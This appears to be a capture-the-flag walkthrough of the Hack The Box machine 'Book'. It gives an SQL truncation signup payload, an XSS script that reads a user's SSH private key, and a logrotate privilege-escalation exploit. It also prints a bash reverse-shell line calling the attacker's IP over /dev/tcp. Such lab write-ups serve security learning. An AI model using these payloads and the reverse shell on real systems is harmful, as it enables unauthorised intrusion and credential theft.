SecWalk.com

HTB Walkthrough Book 10.10.10.176

Summary

Foothold

After the Nmap scan we see there are only 2 ports open. after poking around we discover the sign up page is vulnerable to an SQL truncation Attack

User

Once we are logged into the admin and normal site we discover an XSS vulnerability, cause this vulnerability we were able to get the id_rsa key and login to the box

Root

After some enumeration we discover there is a vulnerability in the log rotate application after exploiting this we were able to take over the machine completely.

Enumeration

Nmap

nmap -sC -sV -p- 10.10.10.176

Web

10.10.10.176

http://10.10.10.176/admin

Turns out it’s vulnerable to sql truncation:

intercepting this request with burp so we can edit it and use the sql truncation attack:

admin%20%20%20%20%20x&email=admin%40book.htb%20%20%20%20%20%20x&password=12345678

admin@book.htb:12345678

XSS attack

10.10.10.176/admin

10.10.10.176

<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>

10.10.10.176/admin

open the collections

and we get our rsa key:

Note: of course we did some more enum with our LFI, thats why we know we need reader as user.

chmod 600 id_rsa

Privilege Escalation

After some enumeration it turns out we found the folowing vulnerability

https://www.exploit-db.com/exploits/47466

compile exploit:

gcc -o exploit exploit.c

create a bash script with reversed shell:

!/bin/bash

bash -i >& /dev/tcp/10.10.14.25/443 0>&1

nc -lvp 443

./exploit -p shell.sh /home/reader/backups/access.log

to speed things a bit up I login with another shell and execute the folowing command to trigger the log rotation

echo rotateme >> /home/reader/backups/access.log

shell was unstable so since there is a id_rsa key I decided to grab that one when the root shell popped up

chmod + 600 root_id

ssh -i root_id root@10.10.10.176

Made by s3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply